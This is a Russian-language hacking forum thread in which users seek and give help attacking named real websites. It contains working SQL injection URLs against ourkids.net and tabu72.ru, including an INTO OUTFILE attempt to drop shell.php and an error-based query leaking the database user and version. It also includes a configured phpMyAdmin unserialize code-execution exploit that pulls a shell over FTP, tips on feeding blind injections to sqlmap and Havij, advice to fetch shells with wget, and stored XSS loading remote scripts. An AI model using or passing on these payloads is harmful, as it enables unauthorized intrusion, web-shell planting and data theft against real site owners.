Ваши вопросы по уязвимостям.

select from

 

Code:

http://www.ourkids.net/camp/camp-profile-agate.php?id=-710%27%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20%20into%20outfile%20%27/var/www/html/ourkids.net/images/shell.php%27%20%20--%20/*

Друзья, кто поможет залиться? Суть проблемы: путь к директориям верный, но мускул выдает ошибку как-будто директории не существует (Errcode: 2), хотя директории реально существуют, и если нет прав на запись, то должна быть (Errcode: 13). Пробовал в разные директории. Результат один. Вообщем смотрите сам и все поймете.

 

Сам сайт и бд находится на разных серверах.

 

инъекция в post запрос

в таком виде a"");mysql_query("update xxx set login='22223' where login='2222'");
выдает ошибку вида - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update xxx set login='22223' where login='2222'");"' at line 1"

а если так a"");mysql_query(update xxx set login='22223' where login='2222');
то пост запрос выполняется, но айпейта не происходит.
подскажите в чем трабл

 

ребят,подскажите,плз...как скормить sqlmap'у блайнд-скулю типа этой (suffix .html)

http://site.com/common/[sql-inj].html

havij её норм берет,как http://site.com/common/%Inject_Here%.html

и где можно почитать про suffix и prefix в скулях...искал в сети,ничего норм не нашел...?

Подскажите,пожалуйста

 

что делаю не так?

Code:

13+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+limit+39,1--

Такой запрос выдает в один список всю базу information_schema и базу сайта.
Собственно вопрос! Каким запросом посмотреть соседние базы если юзер имеет к ним доступ?

 

Попробуй в выводимое поле вставить такой шаблон:

P.S: а вот и примерчик вставки такого блока.

 

Ребят помогите разобраться
Есть phpmyadmin 2.11.2.2
Нашел старый сплоит phpMyAdmin <= 2.11.9 unserialize() arbitrary PHP Code execution exploit
настроил:
$pma_setup_url = 'http://91.212.89.ххх/phpmyadmin/scripts/setup.php'; /*полный адрес скрипта установки phpMyAdmin*/
$ftp_code = 'ftp://логин:пароль@dir.uz/shell.txt'; /*полный ftp-путь до файла с содержимым <? phpinfo();exit; ?>*/

запустил https://127.0.0.1/phpmyadmin/exp.php он мне выдал phpinfo но наверху пишет что есть ошибка в 19 строке $query = $parsed_url['query'];

Затем в шеле вместо <? phpinfo();exit; ?> подставлял "Antichat shell" и "R57Shell" вижу их дерикторию phpmyadmin с файлами с правами -rw-rw-rw- но ничего там не работает и начал ругаться еще и на это:

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\core.lib.php on line 558

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 75

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 76

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 77

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 78

Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 84

Что делаю не так ?

 

лей сразу непосредственно шелл

 

Подскажи как это делается? если не затруднит

 

В sqlmap поставьте * в том месте где уязвимость.
Пример: http://site.com/common/*.html

to dynda2000
Почитайте про system(wget/fetch), там же сразу и file_put_contents() и выбирайте как Вам больше по душе!

 

w3af нашёл уязвимость (ocCommanding), первый раз с ней сталкиваюсь как с ней работать?

 

Всем привет, вобщем такой вопрос
есть скуля в пост запросе

на страницу выводит три ошибки

id=2'

начинаю подбирать колонки

на трёх
id=2'+union+select+1,2,3--+
выводит только одну ошибку
mysql_fetch_array()

и обычный текст страницы(прямого вывода на станицу нету), дальше перебераю и имею все теже три ошибки, собствено, дальше крутить нету смысла, как я дальше в таком случае могу получить какойю либо инфу из БД в таком случае?

 

qaz, error based методом попробывать мб ?

 

ето не тот вывод об ошибке когда юзают error based

 

никто не может помочь?)

 

что на счет того чтоб перевести в урленкод?, или криптованую ссылку где не использауется двойные слеши? вариантов уйма, блескни умом, вопрос достаточно бонален воспользуйся гуглом!!!

 

Нашел XSS в post запросе, если я правильно понял то это активка, что через неё сделать можно, если есть полная свобода:
+ни чего ни фильтруется
+работают script src=lyaya.js
и т.д.

 

Как победить?

PHP:

tabu72.ru/catalog/93)+union+select+1+--+

Выдает

Code:

user warning: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near 'group by td.name' at line 9 query:
catalog_taxonomy_select_brands /* Гость : 
catalog_taxonomy_select_brands */ SELECT td.tid, td.name 
FROM term_node tn left join term_node tnn on tn.nid = tnn.nid
 left join term_data td on td.tid = tnn.tid left join node n on tn.nid 
= n.nid left join content_type_tovar tt on tn.nid = tt.nid WHERE 
tn.tid in ( 93) union select 1 -- ) and tnn.tid not in ( 93) union 
select 1 -- ) group by td.name in /var/www/sites/tabu72.ru/sites/
all/modules/catalog/catalog.module on line 895.      user warning:
 The used SELECT statements have a different number of columns
 query: pager_query /* Гость : pager_query */ SELECT tn.nid, 
td.name, td.tid FROM term_node tn left join term_node tnn on 
tn.nid = tnn.nid left join term_data td on td.tid = tnn.tid left join 
node n on tn.nid = n.nid left join content_type_tovar tt on tn.nid
 = tt.nid WHERE tn.tid in ( 93) union select 1 -- ) and tnn.tid not in 
( 93) union select 1 -- ) and IFNULL(tt.field_price_sale_value, 
0)=0 and tt.field_dateupdate_value is NULL order by n.title asc 
LIMIT 0, 12 in /var/www/sites/tabu72.ru/sites/all/modules/
catalog/catalog.module on line 814.    

Параметр используется во множественных запросах. Если добавить еще 1 колонку, то появятся еще 2 ошибки

 

http://tabu72.ru/catalog/93)or(select(1)from(select+count(0),concat((select(concat_ws(0x3b,user(),version()))),floor(rand(0)*2))from(term_node)+group+by+2)a)--+